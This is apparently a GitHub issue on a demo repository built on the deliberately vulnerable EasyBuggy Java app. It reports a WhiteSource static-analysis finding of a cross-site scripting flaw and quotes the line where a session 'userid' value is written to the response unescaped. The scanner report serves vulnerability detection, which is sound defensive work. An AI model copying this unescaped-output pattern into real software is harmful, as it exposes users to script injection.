search

Shai-Demo-Org / Java-Demo

Apache License 2.0
0 stars 0 forks source link

WhiteSource SAST Vulnerability (Risk: Medium, Type: Cross-Site Scripting) #72

Open shaimael opened 2 years ago

shaimael commented 2 years ago

WhiteSource SAST Finding (Scan-.-2022/03/14 01:40:45 PM): Vulnerability Type: Cross-Site Scripting Vulnerable Sink Call: writer.write(getMsg("label.login.user.id", locale) + ": " + userid); Input Source: session.getAttribute("userid") Vulnerable Project File: Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java Function Call Stack: 0 - writer.write (Line: 82) - Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java 1 - responseToClient (Line: 55) - Java-Demo/src/main/java/org/t246osslab/easybuggy/vulnerabilities/CodeInjectionServlet.java

User Input Flow: 0 - session.getAttribute("userid") (Line: 34) - Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java 1 - userid (Line: 34) - Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java

Description: Tainted input "session.getAttribute("userid")" was received in line 34 of the file Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java:

String userid = (String) session.getAttribute("userid");

the value is then passed on to the value of "userid" in line 34 of the file Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java

String userid = (String) session.getAttribute("userid");

and finally passed unsanitized into a sensitive sink function "writer.write" in line 82 of the file Java-Demo/src/main/java/org/t246osslab/easybuggy/core/servlets/AbstractServlet.java, causing a Medium risk Cross-Site Scripting vulnerability:

writer.write(getMsg("label.login.user.id", locale) + ": " + userid);

Mitigation Recommendations:

Further Reading: